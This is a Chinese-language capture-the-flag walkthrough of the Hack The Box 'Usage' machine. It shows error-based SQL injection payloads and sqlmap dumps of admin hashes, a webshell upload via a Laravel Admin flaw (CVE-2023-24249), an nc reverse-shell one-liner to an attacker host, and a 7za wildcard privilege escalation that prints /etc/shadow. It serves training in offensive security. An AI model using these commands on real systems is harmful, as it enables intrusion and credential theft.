基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV 10.10.11.18
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-15 13:23 CST
Nmap scan report for 10.10.11.18
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
|_  256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.51 seconds

80

需要加hosts:

1
10.10.11.18 usage.htb

一个博客网站,有注册登录,admin是到admin.usage.htb,同样加hosts:

admin.usage.htb

Admin 登录界面:

usage.htb

注册登录没什么东西,忘记密码那里常规输入单引号报错,基础sql注入:

1
2
xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a

sql injection

error盲注,直接sqlmap即可:

1
2
3
4
5
6
7
sqlmap -r sql.txt -v 3 --level 3 --threads 10
sqlmap -r sql.txt -v 3 --level 3 --threads 10 --dbs
sqlmap -r sql.txt -v 3 --level 3 --threads 10 -D usage_blog --tables
sqlmap -r sql.txt -v 3 --level 3 --threads 10 -D usage_blog -T admin_users --dump

admin
$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2

破解出来密码:

1
2
3
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

whatever1

admin.usage.htb

使用得到的账号密码登录admin:

是 laravel admin,右下角可以得到版本号1.8.17

CVE-2023-24249

根据版本信息搜到相关漏洞:

就是头像上传那里上传webshell:

reverse shell

webshell自动清理很快,通过webshell获取reverse shell:

1
2
3
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.4 4444 >/tmp/f

python3 -c 'import pty;pty.spawn("/bin/bash")'

user flag

dash用户目录:

提权信息

dash用户目录有一些monit相关文件,查看这些文件得到一个密码:

1
3nc0d3d_pa$$w0rd

查看用户目录发现xander用户,测试发现xander用户复用这个密码,xander可以sudo运行/usr/bin/usage_management:

usage_management

测试运行usage_management有三个选项,strings查看也可以看到对应运行的命令:

1
2
/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *
/usr/bin/mysqldump -A > /var/backups/mysql_backup.sql

7za

根据strings得到的结果,第一个backup选项应该是先进入/var/www/html目录,然后调用7za,并且命令中使用星号:

1
/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *

我们可以向目标压缩包添加任意文件:

提权 & root flag

向压缩包中添加指定文件,然后解压即可:

shadow

1
2
3
root:$y$j9T$eHRVEjBacjX.aL3Dv.ayh/$ya7Anf39wpVrmChSihyT1sxtFg.2JLtN/z5oNXKDRc4:19809:0:99999:7:::
dash:$y$j9T$vnXc5wuMp/3C1Ao0PfIZS1$bR.rwyVqBNeMUHDNze/yT./JKQ.x9D4CsL3EqgMtkG6:19809:0:99999:7:::
xander:$y$j9T$.0U.eu0EIIaUNyu7iFA1x/$ScdmpKaag.GHK3VFzdBCn19UT1eBLRCO7ghAvz7s0u0:19658:0:99999:7:::

参考资料